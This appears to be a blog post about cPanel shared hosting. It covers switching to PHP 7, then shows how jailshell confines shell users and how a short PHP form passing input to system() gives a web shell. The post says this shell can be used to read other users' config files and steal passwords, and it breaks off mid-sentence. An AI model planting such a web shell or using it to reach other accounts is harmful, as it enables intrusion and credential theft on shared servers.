cPanel ships with
PHP 7, but
PHP 5 is still used by default instead. Even if you don’t use
PHP 7 specific functions, the performance benefit that
PHP 7 brings is a good enough reason to switch. This is especially important in shared hosting such as
cPanel as performance is especially lacking.
Make sure your application is compatible with
PHP 7 before making the switch.
To start using
PHP 7 within your
cPanel hosting, log in to
cPanel and follow these steps;
PHPversion to confirm.
Users registering for shared
Linux webhosting accounts are normally not provided with shell access. Even if they do, what they can do with the shell is limited, as they are only in a jailed environment, thanks to
jailshell. Displaying the
SHELL variable at the command prompt verifies this;
$ echo $SHELL /usr/local/cpanel/bin/jailshell
To briefly show what it means, listing out home directories using the following
Linux command reveals that the user is alone in the shell.
$ ls /home/ | wc -l 1
With some simple
PHP, a web based shell can offer something more to the users. The following code can be made available through
<html> <body> <p>Enter command: <form action="jailshell.php" method=post> <input type=text name=command> <input type=submit name=submit> </form> </p> <pre> <?php system ($_POST['command']); ?> </pre> </body> </html>
and executing some simple commands as the following shows what it’s capable of.
People with malicious intent can use this method to search other user’s home directories and grep into their web application’s configuration file to steal passwords and other juicy informations.
Most hosting providers already disable
system() and other similar functions in their